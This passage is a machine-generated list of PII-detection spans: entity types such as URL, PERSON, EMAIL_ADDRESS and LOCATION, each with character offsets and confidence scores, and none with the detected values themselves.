end: 7452, score: 0.5, type: URL, start: 7584, end: 7589, score: 0.5, type: URL, start: 7600, end: 7605, score: 0.5, type: URL, start: 7632, end: 7639, score: 0.5, type: URL, start: 7673, end: 7679, score: 0.5, type: URL, start: 7783, end: 7789, score: 0.5, type: URL, start: 7844, end: 7854, score: 0.5, type: URL, start: 7894, end: 7900, score: 0.5, type: URL, start: 7987, end: 7994, score: 0.5, type: URL, start: 8088, end: 8105, score: 0.5, type: URL, start: 8124, end: 8134, score: 0.5, type: URL, start: 8195, end: 8205, score: 0.5, type: URL, start: 8215, end: 8232, score: 0.5, type: URL, start: 8302, end: 8312, score: 0.5, type: URL, start: 8322, end: 8327, score: 0.5, type: URL, start: 8481, end: 8486, score: 0.5, type: URL, start: 8497, end: 8502, score: 0.5, type: URL, start: 8529, end: 8536, score: 0.5, type: URL, start: 8570, end: 8576, score: 0.5, type: URL, start: 8631, end: 8637, score: 0.5, type: URL, start: 8768, end: 8774, score: 0.5, type: URL, start: 8884, end: 8891, score: 0.5, type: URL, start: 8986, end: 9003, score: 0.5, type: URL, start: 9028, end: 9038, score: 0.5, type: URL, start: 9204, end: 9209, score: 0.5, type: URL, start: 9362, end: 9367, score: 0.5, type: URL, start: 9378, end: 9383, score: 0.5, type: URL, start: 9410, end: 9417, score: 0.5, type: URL, start: 9451, end: 9457, score: 0.5, type: URL, start: 9588, end: 9594, score: 0.5, type: URL, start: 9698, end: 9704, score: 0.5, type: URL, start: 9815, end: 9822, score: 0.5, type: URL, start: 9989, end: 9995, score: 0.5, type: URL, start: 10012, end: 10018, score: 0.5, type: URL, start: 10105, end: 10110, score: 0.5, type: URL, start: 10263, end: 10268, score: 0.5, type: URL, start: 10279, end: 10284, score: 0.5, type: URL, start: 10311, end: 10318, score: 0.5, type: URL, start: 10352, end: 10358, score: 0.5, type: URL, start: 10489, end: 10495, score: 0.5, type: URL, start: 10599, end: 10605, score: 0.5, type: URL, start: 10716, end: 10723, score: 0.5, type: URL, start: 10880, end: 10886, score: 0.5, type: URL, start: 10954, end: 10960, score: 0.5, type: URL, start: 10977, end: 10983, score: 0.5, type: URL, start: 11242, end: 11247, score: 0.5, type: URL, start: 11567, end: 11572, score: 0.5, type: URL, start: 11616, end: 11621, score: 0.5, type: URL, start: 11660, end: 11666, score: 0.5, type: URL, start: 11692, end: 11698, score: 0.5, type: URL, start: 11728, end: 11741, score: 0.5, type: URL, start: 11744, end: 11750, score: 0.5, type: URL, start: 11836, end: 11847, score: 0.5, type: URL, start: 12058, end: 12063, score: 0.5, type: URL, start: 12094, end: 12099, score: 0.5, type: URL, start: 12110, end: 12115, score: 0.5, type: URL, start: 12148, end: 12153, score: 0.5, type: URL, start: 12192, end: 12198, score: 0.5, type: URL, start: 12224, end: 12230, score: 0.5, type: URL, start: 12278, end: 12291, score: 0.5, type: URL, start: 12294, end: 12300, score: 0.5, type: URL, start: 12379, end: 12390, score: 0.5, type: URL, start: 12485, end: 12491, score: 0.5, type: URL, start: 12517, end: 12523, score: 0.5, type: URL, start: 12572, end: 12585, score: 0.5, type: URL, start: 12588, end: 12594, score: 0.5, type: URL, start: 12674, end: 12685, score: 0.5, type: URL, start: 12735, end: 12741, score: 0.5, type: URL, start: 12767, end: 12773, score: 0.5, type: URL, start: 12803, end: 12816, score: 0.5, type: URL, start: 12819, end: 12825, score: 0.5, type: URL, start: 12905, end: 12916, score: 0.5, type: URL, start: 13007, end: 13012, score: 0.5, type: URL, start: 13093, end: 13109, score: 0.5, type: URL, start: 
13148, end: 13155, score: 0.5, type: URL, start: 13226, end: 13233, score: 0.5, type: URL, start: 13286, end: 13293, score: 0.5, type: URL, start: 13351, end: 13358, score: 0.5, type: URL, start: 13424, end: 13431, score: 0.5, type: URL, start: 13498, end: 13505, score: 0.5, type: URL, start: 13549, end: 13556, score: 0.5, type: URL, start: 13686, end: 13692, score: 0.5, type: URL, start: 13740, end: 13746, score: 0.5, type: URL, start: 13947, end: 13953, score: 0.5, type: URL, start: 14002, end: 14008, score: 0.5, type: URL, start: 14066, end: 14072, score: 0.5, type: URL, start: 14098, end: 14112, score: 0.5, type: URL, start: 14148, end: 14162, score: 0.5, type: URL, start: 14214, end: 14228, score: 0.5, type: URL, start: 14281, end: 14295, score: 0.5, type: URL, start: 14348, end: 14354, score: 0.5, type: URL, start: 14402, end: 14408, score: 0.5, type: URL, start: 14463, end: 14469, score: 0.5, type: URL, start: 14495, end: 14509, score: 0.5, type: URL, start: 14559, end: 14565, score: 0.5, type: URL, start: 15143, end: 15153, score: 0.5, type: URL, start: 15818, end: 15838, score: 0.5, type: URL, start: 15890, end: 15896, score: 0.5, type: URL, start: 15966, end: 15977, score: 0.5, type: URL, start: 16000, end: 16010, score: 0.5, type: URL, start: 16060, end: 16066, score: 0.5, type: URL, start: 16095, end: 16109, score: 0.5, type: URL, start: 16129, end: 16135, score: 0.5, type: URL, start: 16165, end: 16178, score: 0.5, type: URL, start: 16200, end: 16213, score: 0.5, type: URL, start: 16245, end: 16251, score: 0.5, type: URL, start: 16536, end: 16542, score: 0.5, type: URL, start: 16665, end: 16679, score: 0.5, type: URL, start: 16780, end: 16794, score: 0.5, type: URL, start: 16849, end: 16856, score: 0.5, type: URL, start: 17021, end: 17035, score: 0.5, type: URL, start: 17206, end: 17220, score: 0.5, type: URL, start: 17374, end: 17388, score: 0.5, type: URL, start: 17472, end: 17492, score: 0.5, type: URL, start: 17790, end: 17807, score: 0.5, type: URL, start: 17922, end: 17940, score: 0.5, type: URL, start: 17976, end: 17993, score: 0.5, type: URL, start: 18145, end: 18151, score: 0.5, type: URL, start: 18177, end: 18191, score: 0.5, type: URL, start: 18257, end: 18263, score: 0.5, type: URL, start: 18400, end: 18406, score: 0.5, type: URL, start: 18416, end: 18425, score: 0.5, type: URL, start: 18542, end: 18548, score: 0.5, type: URL, start: 18558, end: 18567, score: 0.5, type: URL, start: 18607, end: 18613, score: 0.5, type: URL, start: 18639, end: 18653, score: 0.5, type: URL, start: 18719, end: 18725, score: 0.5, type: URL, start: 18829, end: 18842, score: 0.5, type: URL, start: 18937, end: 18943, score: 0.5, type: URL, start: 18969, end: 18983, score: 0.5, type: URL, start: 19049, end: 19055, score: 0.5, type: URL, start: 19218, end: 19224, score: 0.5, type: URL, start: 19250, end: 19256, score: 0.5, type: URL, start: 19282, end: 19296, score: 0.5, type: URL, start: 19362, end: 19368, score: 0.5, type: URL, start: 19472, end: 19485, score: 0.5, type: URL, start: 19575, end: 19581, score: 0.5, type: URL, start: 19607, end: 19613, score: 0.5, type: URL, start: 19639, end: 19653, score: 0.5, type: URL, start: 19719, end: 19725, score: 0.5, type: URL, start: 19829, end: 19842, score: 0.5, type: URL, start: 19937, end: 19943, score: 0.5, type: URL, start: 19969, end: 19983, score: 0.5, type: URL, start: 20049, end: 20055, score: 0.5, type: URL, start: 20159, end: 20172, score: 0.5, type: URL, start: 20262, end: 20268, score: 0.5, type: URL, start: 20322, end: 20328, score: 
0.5, type: URL, start: 20354, end: 20368, score: 0.5, type: URL, start: 20412, end: 20418, score: 0.5, type: URL, start: 20444, end: 20458, score: 0.5, type: URL, start: 20524, end: 20530, score: 0.5, type: URL, start: 20761, end: 20767, score: 0.5, type: URL, start: 20793, end: 20807, score: 0.5, type: URL, start: 20851, end: 20857, score: 0.5, type: URL, start: 20883, end: 20897, score: 0.5, type: URL, start: 20964, end: 20970, score: 0.5, type: URL, start: 21206, end: 21212, score: 0.5, type: URL, start: 21238, end: 21252, score: 0.5, type: URL, start: 21296, end: 21302, score: 0.5, type: URL, start: 21328, end: 21342, score: 0.5, type: URL, start: 21409, end: 21415, score: 0.5, type: URL, start: 21719, end: 21725, score: 0.5, type: URL, start: 21789, end: 21796, score: 0.5, type: URL, start: 21814, end: 21821, score: 0.5, type: URL, start: 21871, end: 21876, score: 0.5, type: URL, start: 21911, end: 21923, score: 0.5, type: URL, start: 21947, end: 21954, score: 0.5, type: URL, start: 22015, end: 22021, score: 0.5, type: URL, start: 22049, end: 22056, score: 0.5, type: URL, start: 22085, end: 22091, score: 0.5, type: URL, start: 22133, end: 22139, score: 0.5, type: URL, start: 22167, end: 22173, score: 0.5, type: URL, start: 22278, end: 22285, score: 0.5, type: URL, start: 22319, end: 22325, score: 0.5, type: URL, start: 22368, end: 22381, score: 0.5, type: URL, start: 22438, end: 22451, score: 0.5, type: URL, start: 22499, end: 22512, score: 0.5, type: URL, start: 22615, end: 22629, score: 0.5, type: URL, start: 22675, end: 22688, score: 0.5, type: URL, start: 22732, end: 22745, score: 0.5, type: URL, start: 22767, end: 22785, score: 0.5, type: URL, start: 22828, end: 22835, score: 0.5, type: URL, start: 22863, end: 22876, score: 0.5, type: URL, start: 22890, end: 22896, score: 0.5, type: URL, start: 22916, end: 22922, score: 0.5, type: URL, start: 22948, end: 22961, score: 0.5, type: URL, start: 22979, end: 22992, score: 0.5, type: URL, start: 23002, end: 23015, score: 0.5, type: URL, start: 23031, end: 23044, score: 0.5, type: URL, start: 23278, end: 23291, score: 0.5, type: URL, start: 23410, end: 23417, score: 0.5, type: URL, start: 23451, end: 23457, score: 0.5, type: URL, start: 23505, end: 23523, score: 0.5, type: URL, start: 23566, end: 23573, score: 0.5, type: URL, start: 23685, end: 23692, score: 0.5, type: URL, start: 23918, end: 23936, score: 0.5, type: URL, start: 23947, end: 23954, score: 0.5, type: URL, start: 24040, end: 24049, score: 0.5, type: URL, start: 24078, end: 24085, score: 0.5, type: URL, start: 24120, end: 24126, score: 0.5, type: URL, start: 24154, end: 24160, score: 0.5, type: URL, start: 24195, end: 24204, score: 0.5, type: URL, start: 24255, end: 24261, score: 0.5, type: URL, start: 24302, end: 24308, score: 0.5, type: URL, start: 24345, end: 24351, score: 0.5, type: URL, start: 24386, end: 24392, score: 0.5, type: URL, start: 24435, end: 24441, score: 0.5, type: URL, start: 24469, end: 24475, score: 0.5, type: URL, start: 24586, end: 24591, score: 0.5, type: URL, start: 24622, end: 24627, score: 0.5, type: URL, start: 24638, end: 24643, score: 0.5, type: URL, start: 24676, end: 24681, score: 0.5, type: URL, start: 24712, end: 24719, score: 0.5, type: URL, start: 24749, end: 24754, score: 0.5, type: URL, start: 24799, end: 24804, score: 0.5, type: URL, start: 24832, end: 24846, score: 0.5, type: URL, start: 24886, end: 24900, score: 0.5, type: URL, start: 24914, end: 24921, score: 0.5, type: URL, start: 24951, end: 24956, score: 0.5, type: URL, start: 
24996, end: 25001, score: 0.5, type: URL, start: 25029, end: 25038, score: 0.5, type: URL, start: 25047, end: 25061, score: 0.5, type: URL, start: 25100, end: 25114, score: 0.5, type: URL, start: 25143, end: 25150, score: 0.5, type: URL, start: 25180, end: 25185, score: 0.5, type: URL, start: 25225, end: 25230, score: 0.5, type: URL, start: 25258, end: 25272, score: 0.5, type: URL, start: 25290, end: 25297, score: 0.5, type: URL, start: 25333, end: 25338, score: 0.5, type: URL, start: 25366, end: 25375, score: 0.5, type: URL, start: 25384, end: 25398, score: 0.5, type: URL, start: 25407, end: 25412, score: 0.5, type: URL, start: 25532, end: 25537, score: 0.5, type: URL, start: 25568, end: 25573, score: 0.5, type: URL, start: 25584, end: 25589, score: 0.5, type: URL, start: 25608, end: 25615, score: 0.5, type: URL, start: 25651, end: 25656, score: 0.5, type: URL, start: 25691, end: 25705, score: 0.5, type: URL, start: 25733, end: 25738, score: 0.5, type: URL, start: 25764, end: 25782, score: 0.5, type: URL, start: 25830, end: 25837, score: 0.5, type: URL, start: 25873, end: 25878, score: 0.5, type: URL, start: 25906, end: 25920, score: 0.5, type: URL, start: 25960, end: 25974, score: 0.5, type: URL, start: 25983, end: 26001, score: 0.5, type: URL, start: 26044, end: 26051, score: 0.5, type: URL, start: 26087, end: 26092, score: 0.5, type: URL, start: 26120, end: 26129, score: 0.5, type: URL, start: 26138, end: 26152, score: 0.5, type: URL, start: 26161, end: 26179, score: 0.5, type: URL, start: 26222, end: 26229, score: 0.5, type: URL, start: 26265, end: 26270, score: 0.5, type: URL, start: 26298, end: 26312, score: 0.5, type: URL, start: 26325, end: 26330, score: 0.5, type: URL, start: 26820, end: 26827, score: 0.5, type: MEDICAL_LICENSE, start: 1375, end: 1384, score: 1.0, type: URL, start: 1316, end: 1386, score: 0.95, type: LOCATION, start: 73, end: 83, score: 0.85, type: LOCATION, start: 1480, end: 1502, score: 0.85, type: URL, start: 1503, end: 1508, score: 0.85, type: URL, start: 2366, end: 2374, score: 0.85, type: URL, start: 3678, end: 3685, score: 0.85, type: URL, start: 4633, end: 4638, score: 0.85, type: PERSON, start: 4916, end: 4949, score: 0.85, type: URL, start: 5493, end: 5498, score: 0.85, type: URL, start: 5928, end: 5940, score: 0.85, type: URL, start: 6117, end: 6129, score: 0.85, type: PERSON, start: 6734, end: 6768, score: 0.85, type: URL, start: 1776, end: 1856, score: 0.6, type: URL, start: 2066, end: 2160, score: 0.6, type: URL, start: 3521, end: 3608, score: 0.6, type: URL, start: 950, end: 957, score: 0.5, type: URL, start: 2301, end: 2308, score: 0.5, type: URL, start: 2464, end: 2472, score: 0.5, type: URL, start: 2592, end: 2599, score: 0.5, type: URL, start: 2846, end: 2853, score: 0.5, type: URL, start: 3736, end: 3750, score: 0.5, type: URL, start: 3879, end: 3887, score: 0.5, type: URL, start: 4173, end: 4180, score: 0.5, type: URL, start: 4923, end: 4928, score: 0.5, type: URL, start: 5028, end: 5035, score: 0.5, type: URL, start: 5219, end: 5226, score: 0.5, type: URL, start: 5426, end: 5433, score: 0.5, type: URL, start: 5671, end: 5683, score: 0.5, type: URL, start: 5692, end: 5697, score: 0.5, type: URL, start: 5851, end: 5858, score: 0.5, type: URL, start: 6180, end: 6192, score: 0.5, type: URL, start: 6328, end: 6335, score: 0.5, type: URL, start: 6365, end: 6372, score: 0.5, type: URL, start: 6432, end: 6439, score: 0.5, type: URL, start: 6525, end: 6532, score: 0.5, type: URL, start: 6614, end: 6621, score: 0.5, type: URL, start: 6670, end: 6677, 
score: 0.5, type: URL, start: 6752, end: 6759, score: 0.5, type: EMAIL_ADDRESS, start: 171, end: 186, score: 1.0, type: EMAIL_ADDRESS, start: 206, end: 221, score: 1.0, type: DATE_TIME, start: 126, end: 130, score: 0.85, type: PERSON, start: 131, end: 143, score: 0.85, type: PERSON, start: 158, end: 186, score: 0.85, type: PERSON, start: 541, end: 545, score: 0.85, type: PERSON, start: 1042, end: 1058, score: 0.85, type: PERSON, start: 1379, end: 1407, score: 0.85, type: PERSON, start: 2266, end: 2279, score: 0.85, type: URL, start: 3032, end: 3039, score: 0.85, type: URL, start: 3085, end: 3090, score: 0.85, type: URL, start: 3132, end: 3139, score: 0.85, type: PERSON, start: 3265, end: 3281, score: 0.85, type: PERSON, start: 3598, end: 3611, score: 0.85, type: PERSON, start: 3911, end: 3927, score: 0.85, type: PERSON, start: 3930, end: 3946, score: 0.85, type: PERSON, start: 4197, end: 4213, score: 0.85, type: PERSON, start: 4216, end: 4232, score: 0.85, type: PERSON, start: 4319, end: 4352, score: 0.85, type: PERSON, start: 4431, end: 4447, score: 0.85, type: PERSON, start: 4450, end: 4466, score: 0.85, type: PERSON, start: 4529, end: 4545, score: 0.85, type: PERSON, start: 4608, end: 4624, score: 0.85, type: PERSON, start: 4825, end: 4841, score: 0.85, type: PERSON, start: 4926, end: 4941, score: 0.85, type: PERSON, start: 5060, end: 5076, score: 0.85, type: PERSON, start: 7197, end: 7213, score: 0.85, type: PERSON, start: 8300, end: 8316, score: 0.85, type: PERSON, start: 8472, end: 8486, score: 0.85, type: PERSON, start: 9193, end: 9209, score: 0.85, type: URL, start: 9409, end: 9416, score: 0.85, type: URL, start: 9523, end: 9530, score: 0.85, type: URL, start: 9610, end: 9617, score: 0.85, type: PERSON, start: 9807, end: 9823, score: 0.85, type: URL, start: 177, end: 186, score: 0.5, type: URL, start: 212, end: 221, score: 0.5, type: URL, start: 406, end: 419, score: 0.5, type: URL, start: 627, end: 635, score: 0.5, type: URL, start: 642, end: 647, score: 0.5, type: URL, start: 722, end: 730, score: 0.5, type: URL, start: 750, end: 757, score: 0.5, type: URL, start: 853, end: 860, score: 0.5, type: URL, start: 894, end: 901, score: 0.5, type: URL, start: 929, end: 936, score: 0.5, type: URL, start: 947, end: 954, score: 0.5, type: URL, start: 1061, end: 1066, score: 0.5, type: URL, start: 1152, end: 1157, score: 0.5, type: URL, start: 1187, end: 1194, score: 0.5, type: URL, start: 1232, end: 1237, score: 0.5, type: URL, start: 1299, end: 1306, score: 0.5, type: URL, start: 1344, end: 1349, score: 0.5, type: URL, start: 1424, end: 1429, score: 0.5, type: URL, start: 1489, end: 1496, score: 0.5, type: URL, start: 1530, end: 1535, score: 0.5, type: URL, start: 1633, end: 1638, score: 0.5, type: URL, start: 1700, end: 1707, score: 0.5, type: URL, start: 1745, end: 1750, score: 0.5, type: URL, start: 1780, end: 1787, score: 0.5, type: URL, start: 1834, end: 1839, score: 0.5, type: URL, start: 1869, end: 1876, score: 0.5, type: URL, start: 1923, end: 1928, score: 0.5, type: URL, start: 1990, end: 1997, score: 0.5, type: URL, start: 2035, end: 2040, score: 0.5, type: URL, start: 2124, end: 2129, score: 0.5, type: URL, start: 2159, end: 2166, score: 0.5, type: URL, start: 2310, end: 2317, score: 0.5, type: URL, start: 2352, end: 2357, score: 0.5, type: URL, start: 2391, end: 2398, score: 0.5, type: URL, start: 2463, end: 2468, score: 0.5, type: URL, start: 2503, end: 2510, score: 0.5, type: URL, start: 2576, end: 2581, score: 0.5, type: URL, start: 2614, end: 2621, score: 0.5, type: URL, 
start: 2685, end: 2690, score: 0.5, type: URL, start: 2725, end: 2732, score: 0.5, type: URL, start: 2798, end: 2803, score: 0.5, type: URL, start: 2847, end: 2854, score: 0.5, type: URL, start: 2921, end: 2926, score: 0.5, type: URL, start: 2969, end: 2976, score: 0.5, type: URL, start: 3284, end: 3289, score: 0.5, type: URL, start: 3374, end: 3379, score: 0.5, type: URL, start: 3454, end: 3459, score: 0.5, type: URL, start: 3482, end: 3489, score: 0.5, type: URL, start: 3648, end: 3653, score: 0.5, type: URL, start: 3679, end: 3686, score: 0.5, type: URL, start: 3736, end: 3741, score: 0.5, type: URL, start: 3930, end: 3935, score: 0.5, type: URL, start: 3989, end: 3996, score: 0.5, type: URL, start: 4032, end: 4037, score: 0.5, type: URL, start: 4216, end: 4221, score: 0.5, type: URL, start: 4243, end: 4250, score: 0.5, type: URL, start: 4295, end: 4300, score: 0.5, type: URL, start: 4450, end: 4455, score: 0.5, type: URL, start: 4477, end: 4484, score: 0.5, type: URL, start: 4529, end: 4534, score: 0.5, type: URL, start: 4556, end: 4563, score: 0.5, type: URL, start: 4608, end: 4613, score: 0.5, type: URL, start: 4687, end: 4692, score: 0.5, type: URL, start: 4844, end: 4849, score: 0.5, type: URL, start: 4872, end: 4880, score: 0.5, type: URL, start: 4926, end: 4931, score: 0.5, type: URL, start: 5079, end: 5084, score: 0.5, type: URL, start: 5166, end: 5171, score: 0.5, type: URL, start: 5260, end: 5265, score: 0.5, type: URL, start: 5296, end: 5303, score: 0.5, type: URL, start: 5349, end: 5354, score: 0.5, type: URL, start: 5385, end: 5392, score: 0.5, type: URL, start: 5436, end: 5443, score: 0.5, type: URL, start: 5465, end: 5472, score: 0.5, type: URL, start: 5568, end: 5575, score: 0.5, type: URL, start: 5755, end: 5763, score: 0.5, type: URL, start: 5777, end: 5784, score: 0.5, type: URL, start: 5810, end: 5817, score: 0.5, type: URL, start: 5822, end: 5830, score: 0.5, type: URL, start: 5926, end: 5933, score: 0.5, type: URL, start: 5950, end: 5957, score: 0.5, type: URL, start: 6011, end: 6016, score: 0.5, type: URL, start: 6073, end: 6077, score: 0.5, type: URL, start: 6201, end: 6205, score: 0.5, type: URL, start: 6380, end: 6387, score: 0.5, type: URL, start: 6423, end: 6428, score: 0.5, type: URL, start: 6508, end: 6512, score: 0.5, type: URL, start: 6636, end: 6640, score: 0.5, type: URL, start: 6734, end: 6741, score: 0.5, type: URL, start: 6777, end: 6782, score: 0.5, type: URL, start: 6868, end: 6872, score: 0.5, type: URL, start: 6993, end: 6997, score: 0.5, type: URL, start: 7216, end: 7221, score: 0.5, type: URL, start: 7258, end: 7265, score: 0.5, type: URL, start: 7314, end: 7319, score: 0.5, type: URL, start: 7356, end: 7363, score: 0.5, type: URL, start: 7412, end: 7417, score: 0.5, type: URL, start: 7446, end: 7453, score: 0.5, type: URL, start: 7502, end: 7507, score: 0.5, type: URL, start: 7546, end: 7553, score: 0.5, type: URL, start: 7600, end: 7605, score: 0.5, type: URL, start: 7643, end: 7650, score: 0.5, type: URL, start: 7696, end: 7701, score: 0.5, type: URL, start: 7736, end: 7743, score: 0.5, type: URL, start: 7786, end: 7791, score: 0.5, type: URL, start: 7827, end: 7834, score: 0.5, type: URL, start: 7878, end: 7883, score: 0.5, type: URL, start: 7972, end: 7977, score: 0.5, type: URL, start: 8015, end: 8022, score: 0.5, type: URL, start: 8068, end: 8073, score: 0.5, type: URL, start: 8155, end: 8160, score: 0.5, type: URL, start: 8319, end: 8324, score: 0.5, type: URL, start: 8422, end: 8427, score: 0.5, type: URL, start: 8525, end: 8530, 
score: 0.5, type: URL, start: 8624, end: 8631, score: 0.5, type: URL, start: 8656, end: 8661, score: 0.5, type: URL, start: 8732, end: 8736, score: 0.5, type: URL, start: 8824, end: 8828, score: 0.5, type: URL, start: 8914, end: 8918, score: 0.5, type: URL, start: 9006, end: 9010, score: 0.5, type: URL, start: 9093, end: 9100, score: 0.5, type: URL, start: 9212, end: 9217, score: 0.5, type: URL, start: 9279, end: 9285, score: 0.5, type: URL, start: 9349, end: 9356, score: 0.5, type: URL, start: 9689, end: 9696, score: 0.5, type: URL, start: 9826, end: 9831, score: 0.5, type: URL, start: 9859, end: 9866, score: 0.5, type: URL, start: 9909, end: 9914, score: 0.5, type: URL, start: 9943, end: 9950, score: 0.5, type: URL, start: 9994, end: 9999, score: 0.5, type: URL, start: 10067, end: 10074, score: 0.5, type: URL, start: 10108, end: 10113, score: 0.5, type: URL, start: 10144, end: 10151, score: 0.5, type: URL, start: 10197, end: 10202, score: 0.5, type: URL, start: 10233, end: 10240, score: 0.5, type: URL, start: 10286, end: 10291, score: 0.5, type: URL, start: 10320, end: 10327, score: 0.5, type: URL, start: 10371, end: 10376, score: 0.5, type: URL, start: 10405, end: 10412, score: 0.5, type: EMAIL_ADDRESS, start: 218, end: 233, score: 1.0, type: PERSON, start: 1153, end: 1158, score: 0.85, type: URL, start: 381, end: 417, score: 0.6, type: IP_ADDRESS, start: 1105, end: 1106, score: 0.6, type: IP_ADDRESS, start: 1118, end: 1122, score: 0.6, type: URL, start: 74, end: 80, score: 0.5, type: URL, start: 224, end: 233, score: 0.5, type: URL, start: 540, end: 546, score: 0.5, type: URL, start: 547, end: 557, score: 0.5, type: URL, start: 578, end: 583, score: 0.5, type: URL, start: 584, end: 594, score: 0.5, type: URL, start: 614, end: 621, score: 0.5, type: URL, start: 622, end: 632, score: 0.5, type: URL, start: 654, end: 661, score: 0.5, type: URL, start: 662, end: 672, score: 0.5, type: URL, start: 694, end: 701, score: 0.5, type: URL, start: 702, end: 712, score: 0.5, type: URL, start: 734, end: 739, score: 0.5, type: URL, start: 740, end: 750, score: 0.5, type: URL, start: 770, end: 775, score: 0.5, type: URL, start: 776, end: 786, score: 0.5, type: URL, start: 806, end: 814, score: 0.5, type: URL, start: 815, end: 825, score: 0.5, type: URL, start: 848, end: 853, score: 0.5, type: URL, start: 854, end: 864, score: 0.5, type: URL, start: 884, end: 892, score: 0.5, type: URL, start: 893, end: 903, score: 0.5, type: URL, start: 946, end: 953, score: 0.5, type: EMAIL_ADDRESS, start: 79, end: 94, score: 1.0, type: DATE_TIME, start: 57, end: 61, score: 0.85, type: PERSON, start: 62, end: 78, score: 0.85, type: LOCATION, start: 791, end: 797, score: 0.85, type: LOCATION, start: 817, end: 820, score: 0.85, type: LOCATION, start: 1204, end: 1206, score: 0.85, type: LOCATION, start: 1281, end: 1283, score: 0.85, type: URL, start: 26, end: 39, score: 0.5, type: URL, start: 85, end: 94, score: 0.5, type: URL, start: 991, end: 996, score: 0.5, type: URL, start: 1074, end: 1080, score: 0.5, type: URL, start: 1107, end: 1120, score: 0.5, type: URL, start: 1296, end: 1302, score: 0.5, type: URL, start: 1315, end: 1321, score: 0.5, type: URL, start: 1335, end: 1341, score: 0.5, type: URL, start: 1442, end: 1448, score: 0.5, type: URL, start: 1467, end: 1473, score: 0.5, type: URL, start: 1490, end: 1495, score: 0.5, type: URL, start: 1498, end: 1503, score: 0.5, type: URL, start: 1509, end: 1515, score: 0.5, type: URL, start: 1582, end: 1588, score: 0.5, type: URL, start: 1599, end: 1607, score: 0.5, 
type: URL, start: 1689, end: 1695, score: 0.5, type: EMAIL_ADDRESS, start: 2757, end: 2772, score: 1.0, type: NRP, start: 598, end: 611, score: 0.85, type: PERSON, start: 616, end: 641, score: 0.85, type: NRP, start: 1138, end: 1168, score: 0.85, type: LOCATION, start: 1523, end: 1551, score: 0.85, type: NRP, start: 2072, end: 2083, score: 0.85, type: LOCATION, start: 2551, end: 2562, score: 0.85, type: DATE_TIME, start: 3469, end: 3474, score: 0.85, type: DATE_TIME, start: 4858, end: 4873, score: 0.85, type: URL, start: 245, end: 252, score: 0.5, type: URL, start: 358, end: 365, score: 0.5, type: URL, start: 386, end: 393, score: 0.5, type: URL, start: 437, end: 444, score: 0.5, type: URL, start: 506, end: 513, score: 0.5, type: URL, start: 519, end: 527, score: 0.5, type: URL, start: 646, end: 653, score: 0.5, type: URL, start: 660, end: 668, score: 0.5, type: URL, start: 692, end: 699, score: 0.5, type: URL, start: 705, end: 713, score: 0.5, type: URL, start: 783, end: 797, score: 0.5, type: URL, start: 850, end: 857, score: 0.5, type: URL, start: 1000, end: 1007, score: 0.5, type: URL, start: 1368, end: 1375, score: 0.5, type: URL, start: 1448, end: 1455, score: 0.5, type: URL, start: 1523, end: 1535, score: 0.5, type: URL, start: 1624, end: 1631, score: 0.5, type: URL, start: 2162, end: 2167, score: 0.5, type: URL, start: 2232, end: 2237, score: 0.5, type: URL, start: 2298, end: 2308, score: 0.5, type: URL, start: 2390, end: 2395, score: 0.5, type: URL, start: 2507, end: 2516, score: 0.5, type: URL, start: 2763, end: 2772, score: 0.5, type: URL, start: 2789, end: 2794, score: 0.5, type: URL, start: 2888, end: 2892, score: 0.5, type: URL, start: 2921, end: 2925, score: 0.5, type: URL, start: 2950, end: 2954, score: 0.5, type: URL, start: 2977, end: 2981, score: 0.5, type: URL, start: 3007, end: 3011, score: 0.5, type: URL, start: 3038, end: 3042, score: 0.5, type: URL, start: 3066, end: 3070, score: 0.5, type: URL, start: 3327, end: 3331, score: 0.5, type: URL, start: 3374, end: 3394, score: 0.5, type: URL, start: 3422, end: 3426, score: 0.5, type: URL, start: 3609, end: 3616, score: 0.5, type: URL, start: 3783, end: 3790, score: 0.5, type: URL, start: 4382, end: 4392, score: 0.5, type: URL, start: 4395, end: 4402, score: 0.5, type: URL, start: 4639, end: 4646, score: 0.5, type: URL, start: 4828, end: 4835, score: 0.5, type: URL, start: 4846, end: 4853, score: 0.5, type: URL, start: 5356, end: 5363, score: 0.5, type: EMAIL_ADDRESS, start: 6445, end: 6460, score: 1.0, type: PERSON, start: 32, end: 42, score: 0.85, type: PERSON, start: 530, end: 539, score: 0.85, type: PERSON, start: 539, end: 547, score: 0.85, type: LOCATION, start: 608, end: 625, score: 0.85, type: PERSON, start: 1668, end: 1679, score: 0.85, type: PERSON, start: 3024, end: 3035, score: 0.85, type: LOCATION, start: 4233, end: 4244, score: 0.85, type: LOCATION, start: 5717, end: 5728, score: 0.85, type: DATE_TIME, start: 7021, end: 7031, score: 0.85, type: URL, start: 32, end: 42, score: 0.5, type: URL, start: 145, end: 160, score: 0.5, type: URL, start: 261, end: 273, score: 0.5, type: URL, start: 412, end: 418, score: 0.5, type: URL, start: 446, end: 452, score: 0.5, type: URL, start: 536, end: 541, score: 0.5, type: URL, start: 563, end: 577, score: 0.5, type: URL, start: 608, end: 617, score: 0.5, type: URL, start: 636, end: 642, score: 0.5, type: URL, start: 660, end: 666, score: 0.5, type: URL, start: 936, end: 942, score: 0.5, type: URL, start: 1049, end: 1055, score: 0.5, type: URL, start: 1636, end: 1651, 
score: 0.5, type: URL, start: 1668, end: 1675, score: 0.5, type: URL, start: 1687, end: 1697, score: 0.5, type: URL, start: 1702, end: 1710, score: 0.5, type: URL, start: 1795, end: 1807, score: 0.5, type: URL, start: 1862, end: 1870, score: 0.5, type: URL, start: 1935, end: 1957, score: 0.5, type: URL, start: 1982, end: 1997, score: 0.5, type: URL, start: 2048, end: 2063, score: 0.5, type: URL, start: 2081, end: 2089, score: 0.5, type: URL, start: 2095, end: 2110, score: 0.5, type: URL, start: 2122, end: 2136, score: 0.5, type: URL, start: 2166, end: 2173, score: 0.5, type: URL, start: 2213, end: 2225, score: 0.5, type: URL, start: 2304, end: 2312, score: 0.5, type: URL, start: 2345, end: 2357, score: 0.5, type: URL, start: 2364, end: 2372, score: 0.5, type: URL, start: 2518, end: 2530, score: 0.5, type: URL, start: 2570, end: 2582, score: 0.5, type: URL, start: 2607, end: 2614, score: 0.5, type: URL, start: 2986, end: 2993, score: 0.5, type: URL, start: 3024, end: 3031, score: 0.5, type: URL, start: 3127, end: 3139, score: 0.5, type: URL, start: 3339, end: 3351, score: 0.5, type: URL, start: 3537, end: 3549, score: 0.5, type: URL, start: 3681, end: 3693, score: 0.5, type: URL, start: 3724, end: 3731, score: 0.5, type: URL, start: 3761, end: 3773, score: 0.5, type: URL, start: 3814, end: 3826, score: 0.5, type: URL, start: 3942, end: 3948, score: 0.5, type: URL, start: 3972, end: 3985, score: 0.5, type: URL, start: 4058, end: 